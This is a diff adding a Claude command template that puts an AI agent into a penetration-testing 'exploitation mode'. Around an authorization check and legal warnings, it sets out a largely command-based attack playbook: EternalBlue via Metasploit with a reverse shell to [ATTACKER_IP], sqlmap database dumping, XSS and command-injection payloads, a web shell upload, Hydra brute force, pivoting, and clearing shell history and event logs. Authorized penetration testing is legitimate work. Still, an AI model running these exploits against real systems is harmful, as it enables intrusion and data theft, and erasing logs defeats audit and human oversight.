myaidev-method 0.2.19 → 0.2.23

package/src/templates/claude/commands/sc:security-exploit.md

@@ -0,0 +1,464 @@
+---
+name: security-exploit
+description: Exploitation operations with mandatory authorization and ethical guidelines
+version: 1.0.0
+category: security
+agent: penetration-tester
+---
+
+# Security Exploitation Command
+
+Execute exploitation operations following professional penetration testing standards with strict authorization and ethical guidelines.
+
+## ⚠️ CRITICAL WARNINGS
+
+**LEGAL REQUIREMENTS:**
+- Explicit written authorization REQUIRED before ANY exploitation
+- Unauthorized exploitation is ILLEGAL and subject to prosecution
+- Criminal penalties include imprisonment and substantial fines
+- Civil liability for damages caused by unauthorized testing
+
+**ETHICAL GUIDELINES:**
+- Exploitation ONLY on authorized targets within engagement scope
+- Minimize system disruption and data access
+- Immediately report critical vulnerabilities
+- Follow rules of engagement strictly
+- Maintain professional conduct at all times
+
+## Pre-Execution Requirements
+
+**CRITICAL Authorization Check:**
+```javascript
+import { requireAuthorization, AuthLevel } from '../../../src/libs/security/authorization-checker.js';
+
+// User must provide target
+const target = process.argv[2];
+if (!target) {
+  console.error('Usage: /sc:security-exploit <target>');
+  console.error('Example: /sc:security-exploit 192.168.1.10');
+  process.exit(1);
+}
+
+// Verify authorization (exploitation requires EXPLOITATION level)
+await requireAuthorization(target, AuthLevel.EXPLOITATION);
+
+// Display legal warning
+console.log('\n⚠️  LEGAL WARNING ⚠️\n');
+console.log('Exploitation operations authorized under engagement:');
+console.log(`- Engagement ID: ${manifest.engagement_id}`);
+console.log(`- Authorization Level: ${manifest.authorization_level}`);
+console.log(`- Authorized By: ${manifest.authorized_by}`);
+console.log(`- Valid Until: ${manifest.end_date}\n`);
+console.log('All exploitation activities will be logged.\n');
+```
+
+## Command Workflow
+
+When user requests exploitation on a target:
+
+### Step 1: Activate penetration-tester Agent
+
+```
+You are now in exploitation mode.
+
+Target: [USER_PROVIDED_TARGET]
+Authorization Level: EXPLOITATION (full testing authorized)
+
+⚠️  IMPORTANT REMINDERS:
+- Follow rules of engagement strictly
+- Minimize system disruption
+- Document all exploitation attempts
+- Report critical findings immediately
+- Maintain chain of custody for evidence
+
+Execute exploitation following this workflow:
+
+1. Vulnerability Validation
+2. Exploit Selection and Preparation
+3. Proof of Concept (PoC) Exploitation
+4. Post-Exploitation Activities (if authorized)
+5. Evidence Collection
+6. Immediate Reporting
+7. System Cleanup
+```
+
+### Step 2: Vulnerability Validation
+
+```bash
+# Verify vulnerability exists before exploitation
+nmap --script vuln -p [PORT] [TARGET]
+
+# Specific vulnerability verification
+# Example: SMB vulnerability check
+nmap --script smb-vuln-* -p 445 [TARGET]
+
+# Web application vulnerability validation
+nikto -h https://[TARGET]
+
+# Manual verification with curl/telnet
+curl -v https://[TARGET]/vulnerable-endpoint
+```
+
+### Step 3: Exploit Selection
+
+**Exploit Database Search:**
+```bash
+# Search exploit-db
+searchsploit [SERVICE] [VERSION]
+
+# Example: Apache 2.4.49 Path Traversal
+searchsploit apache 2.4.49
+
+# Copy exploit to workspace
+searchsploit -m exploits/[EXPLOIT_ID]
+```
+
+**Metasploit Framework:**
+```bash
+# Start Metasploit console
+msfconsole
+
+# Search for exploits
+msf6 > search [VULNERABILITY]
+msf6 > search type:exploit platform:linux
+
+# Example: EternalBlue exploitation
+msf6 > use exploit/windows/smb/ms17_010_eternalblue
+msf6 > show options
+msf6 > set RHOSTS [TARGET]
+msf6 > set PAYLOAD windows/x64/meterpreter/reverse_tcp
+msf6 > set LHOST [ATTACKER_IP]
+msf6 > check  # Verify vulnerability
+msf6 > exploit
+```
+
+### Step 4: Proof of Concept Exploitation
+
+**Web Application Exploitation:**
+
+**SQL Injection PoC:**
+```bash
+# Manual SQL injection testing
+curl "https://[TARGET]/login?user=admin' OR '1'='1"
+
+# SQLMap automated exploitation
+sqlmap -u "https://[TARGET]/page?id=1" --dbs
+sqlmap -u "https://[TARGET]/page?id=1" -D database --tables
+sqlmap -u "https://[TARGET]/page?id=1" -D database -T users --dump --limit 3
+```
+
+**XSS Exploitation:**
+```bash
+# Reflected XSS PoC
+curl "https://[TARGET]/search?q=<script>alert('XSS')</script>"
+
+# Stored XSS testing
+# POST payload to application
+curl -X POST https://[TARGET]/comment \
+  -d "comment=<script>alert('XSS')</script>"
+```
+
+**Remote Code Execution:**
+```bash
+# Command injection PoC
+curl "https://[TARGET]/ping?host=127.0.0.1;whoami"
+
+# File upload vulnerability
+curl -X POST https://[TARGET]/upload \
+  -F "file=@shell.php"
+
+# Verify code execution (proof only)
+curl https://[TARGET]/uploads/shell.php?cmd=whoami
+```
+
+**Network Service Exploitation:**
+
+**SSH Weak Credentials:**
+```bash
+# Hydra brute force (limited attempts)
+hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://[TARGET]
+
+# Single credential test
+sshpass -p 'password' ssh admin@[TARGET]
+```
+
+**SMB Exploitation:**
+```bash
+# EternalBlue exploitation with MSF
+msfconsole -q -x "use exploit/windows/smb/ms17_010_eternalblue; set RHOSTS [TARGET]; set PAYLOAD windows/x64/meterpreter/reverse_tcp; set LHOST [ATTACKER]; exploit"
+```
+
+### Step 5: Post-Exploitation (Only if Authorized)
+
+⚠️ **CRITICAL**: Only proceed if rules of engagement explicitly allow post-exploitation
+
+**Information Gathering:**
+```bash
+# Meterpreter commands
+meterpreter > sysinfo        # System information
+meterpreter > getuid         # Current user
+meterpreter > ps             # Running processes
+meterpreter > ipconfig       # Network configuration
+meterpreter > route          # Routing table
+
+# Limit data access to PoC only
+meterpreter > cat /etc/passwd | head -5  # Proof only
+meterpreter > ls /home       # Directory listing only
+```
+
+**Privilege Escalation:**
+```bash
+# Linux privilege escalation enumeration
+LinEnum.sh
+
+# Windows privilege escalation
+PowerUp.ps1
+
+# Kernel exploits (use with extreme caution)
+# Only with explicit authorization
+```
+
+**Lateral Movement (Internal Only):**
+```bash
+# Only if INTERNAL authorization level granted
+# Network discovery from compromised host
+meterpreter > run post/windows/gather/arp_scanner
+meterpreter > run post/multi/recon/local_exploit_suggester
+
+# Pivot through compromised host
+meterpreter > portfwd add -l 3389 -p 3389 -r [INTERNAL_TARGET]
+```
+
+### Step 6: Evidence Collection
+
+**Screenshot Evidence:**
+```bash
+# Meterpreter screenshot
+meterpreter > screenshot
+
+# Manual screenshot with scrot
+scrot evidence_[TARGET]_[TIMESTAMP].png
+
+# Web application evidence
+firefox https://[TARGET]/vulnerable-page
+# Screenshot showing exploitation
+```
+
+**Command Output Capture:**
+```bash
+# Log all exploitation attempts
+script exploitation_[TARGET]_[TIMESTAMP].log
+
+# Save command output
+whoami > evidence_whoami.txt
+id > evidence_id.txt
+uname -a > evidence_uname.txt
+```
+
+**Network Traffic Capture:**
+```bash
+# Capture exploitation traffic
+tcpdump -i eth0 -w exploitation_[TARGET].pcap host [TARGET]
+
+# Wireshark capture
+wireshark -i eth0 -k -f "host [TARGET]"
+```
+
+### Step 7: Immediate Reporting
+
+**Critical Finding Notification:**
+```markdown
+# CRITICAL SECURITY FINDING
+
+**Date:** [TIMESTAMP]
+**Engagement ID:** [ENGAGEMENT_ID]
+**Severity:** CRITICAL
+
+## Vulnerability Summary
+
+**Type:** [Remote Code Execution / SQL Injection / etc.]
+**Affected System:** [TARGET]
+**CVSS Score:** [9.8 / Critical]
+
+## Proof of Concept
+
+**Exploitation Steps:**
+1. [STEP_1]
+2. [STEP_2]
+3. [ACHIEVED_RCE/ACCESS]
+
+**Evidence:**
+- Screenshot: [FILENAME]
+- Command Output: [FILENAME]
+- Network Capture: [FILENAME]
+
+## Impact Assessment
+
+**Business Impact:**
+- Complete system compromise possible
+- Sensitive data exposure risk
+- Potential for lateral movement
+
+**Technical Impact:**
+- Remote code execution as [USER]
+- Ability to [READ/WRITE/EXECUTE]
+- Network pivot point established
+
+## Immediate Recommendations
+
+**URGENT (0-24 hours):**
+1. [IMMEDIATE_FIX]
+2. [TEMPORARY_MITIGATION]
+3. [MONITORING]
+
+**Contact:** [SECURITY_CONTACT]
+**Next Steps:** [COORDINATION]
+```
+
+### Step 8: System Cleanup
+
+**Remove Artifacts:**
+```bash
+# Remove uploaded files
+rm /var/www/html/uploads/shell.php
+
+# Clear command history
+history -c
+rm ~/.bash_history
+
+# Remove created users/accounts
+userdel testuser
+
+# Stop persistent services
+systemctl stop malicious_service
+
+# Remove cron jobs
+crontab -r
+```
+
+**Graceful Session Exit:**
+```bash
+# Meterpreter
+meterpreter > clearev  # Clear event logs (only if authorized)
+meterpreter > exit
+
+# SSH
+exit
+
+# Close all connections
+netstat -an | grep [ATTACKER_IP]
+```
+
+## Usage Examples
+
+**Web Application Exploitation:**
+```
+User: "/sc:security-exploit https://app.example.com --sqli"
+
+Response:
+1. Verify EXPLOITATION authorization for app.example.com
+2. Validate SQL injection vulnerability
+3. Execute SQLMap with limited extraction
+4. Capture evidence (3 sample records max)
+5. Immediate critical finding report
+6. Clean up temporary files
+7. Save exploitation report
+```
+
+**Network Service Exploitation:**
+```
+User: "/sc:security-exploit 192.168.1.50 --service smb"
+
+Response:
+1. Check EXPLOITATION authorization for 192.168.1.50
+2. Validate SMB vulnerability (MS17-010)
+3. Metasploit exploitation with reverse shell
+4. Limited post-exploitation (sysinfo, getuid only)
+5. Screenshot and evidence capture
+6. Graceful session termination
+7. Generate exploitation report
+```
+
+**Privilege Escalation:**
+```
+User: "/sc:security-exploit 192.168.1.10 --privesc"
+
+Response:
+1. Verify EXPLOITATION authorization
+2. Enumerate privilege escalation vectors
+3. Attempt authorized escalation method
+4. Document root/SYSTEM access (PoC)
+5. No data exfiltration (PoC only)
+6. System cleanup
+7. Critical finding report
+```
+
+## Output
+
+Save exploitation report to:
+```
+reports/exploitation-[TARGET]-[TIMESTAMP].md
+```
+
+Log all operations:
+```javascript
+await authChecker.logOperation({
+  type: 'exploitation',
+  target: target,
+  vulnerability: vulnerabilityType,
+  result: 'successful_poc',
+  impact: 'critical',
+  user: process.env.USER,
+  evidence_files: evidenceFiles
+});
+```
+
+## Error Handling
+
+**No Authorization:**
+```
+❌ AUTHORIZATION REQUIRED - EXPLOITATION BLOCKED
+
+Target: 192.168.1.50
+Required Level: EXPLOITATION
+Current Level: ACTIVE
+
+CRITICAL: Exploitation requires explicit EXPLOITATION authorization.
+Unauthorized exploitation is ILLEGAL.
+
+This operation has been blocked and logged.
+```
+
+**Out of Scope:**
+```
+❌ TARGET OUT OF SCOPE - EXPLOITATION BLOCKED
+
+Target: production-db.example.com
+Status: EXPLICITLY OUT OF SCOPE
+
+This target is marked as out-of-scope in the authorization manifest.
+Exploitation is PROHIBITED on this system.
+
+This attempt has been logged for audit purposes.
+```
+
+**Engagement Expired:**
+```
+❌ ENGAGEMENT EXPIRED - EXPLOITATION BLOCKED
+
+Engagement End Date: 2025-11-25
+Current Date: 2025-11-26
+
+The authorized testing period has ended.
+No further exploitation is permitted.
+
+Contact client to extend authorization if needed.
+```
+
+---
+
+**Agent:** penetration-tester
+**Authorization Level:** EXPLOITATION
+**Version:** 1.0.0
+
+**⚠️  FINAL WARNING:** This command executes active exploitation. Ensure you have explicit written authorization, understand the legal implications, and follow all rules of engagement. Unauthorized use is strictly prohibited and illegal.